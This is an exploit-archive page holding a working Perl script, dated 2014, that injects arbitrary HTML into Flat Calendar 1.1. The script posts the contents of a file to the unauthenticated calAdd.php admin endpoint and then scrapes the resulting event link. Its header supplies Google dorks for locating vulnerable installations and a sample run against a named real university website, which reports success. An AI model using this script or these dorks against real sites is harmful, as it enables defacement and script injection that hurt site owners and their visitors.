Home / exploits Flat Calendar 1.1 HTML Injection
Posted on 09 December 2014
#!/usr/bin/perl -w #Title : Flat Calendar v1.1 HTML Injection Exploit #Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip #Author : ZoRLu / zorlu@milw00rm.com #Website : http://milw00rm.com / its online #Twitter : https://twitter.com/milw00rm or @milw00rm #Test : Windows7 Ultimate #Date : 08/12/2014 #Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others #BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) ) #Dork1 : intext:"Flat Calendar is powered by Flat File DB" #Dork2 : inurl:"viewEvent.php?eventNumber=" # #C:UsersadminDesktop>perl flat.pl # #Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname #Exam1: perl flat.pl http://localhost / index.html ZoRLu #Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu # #C:UsersadminDesktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu # #[+] Target: http://jcbc.jesus.cam.ac.uk #[+] Path: /member_content/diaries/womens/calendar/ #[+] index: index.html #[+] Nick: ZoRLu #[+] Exploit Succes #[+] Searching url... #[+] YourEventNumber = 709 #[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709 use HTTP::Request::Common qw( POST ); use LWP::UserAgent; use IO::Socket; use strict; use warnings; sub hlp() { system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print " Usage: perl $0 http://target.com /calender_path/ indexfile nickname "; print "Exam1: perl $0 http://localhost / index.html ZoRLu "; print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu "; } if(@ARGV != 4) { hlp(); exit(); } my $ua = LWP::UserAgent->new; my $url = $ARGV[0]; my $path = $ARGV[1]; my $index = $ARGV[2]; my $nick = $ARGV[3]; my $vuln = $url . $path . "admin/calAdd.php"; print " [+] Target: ".$url." "; print "[+] Path: ".$path." "; print "[+] index: ".$index." "; print "[+] Nick: ".$nick." "; my @months = qw(January February March April May June July August September October November December); my ($day, $month, $yearset) = (localtime)[3,4,5]; my $year = 1900 + $yearset; my $moon = $months[$month]; if (open(my $fh, $index)) { while (my $row = <$fh>) { chomp $row; my $req = POST $vuln, [ event => 'Test Page', description => $row, month => $moon, day => $day, year => $year, submitted => $nick, ]; my $resp = $ua->request($req); if ($resp->is_success) { my $message = $resp->decoded_content; my $regex = "Record Added: taking you back"; if ($message =~ /$regex/) { print "[+] Exploit Succes "; my $newua = LWP::UserAgent->new( ); my $newurl = $url . $path . "calendar.php"; my $newreq = $newua->get($newurl); if ($newreq->is_success) { my $newmessage = $newreq->decoded_content; my $first = rindex($newmessage,"viewEvent.php?eventNumber="); print "[+] Searching url... "; my $request = substr($newmessage, $first+26, 4); print "[+] YourEventNumber = $request "; sleep(1); print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request." "; } else { print "[-] HTTP POST error code: ", $newreq->code, " "; print "[-] HTTP POST error message: ", $newreq->message, " "; } } else { print "[-] Exploit Failed"; } } else { print "[-] HTTP POST error code: ", $resp->code, " "; print "[-] HTTP POST error message: ", $resp->message, " "; } } } else { sleep(1); die ("[-] NotFound: $index "); }
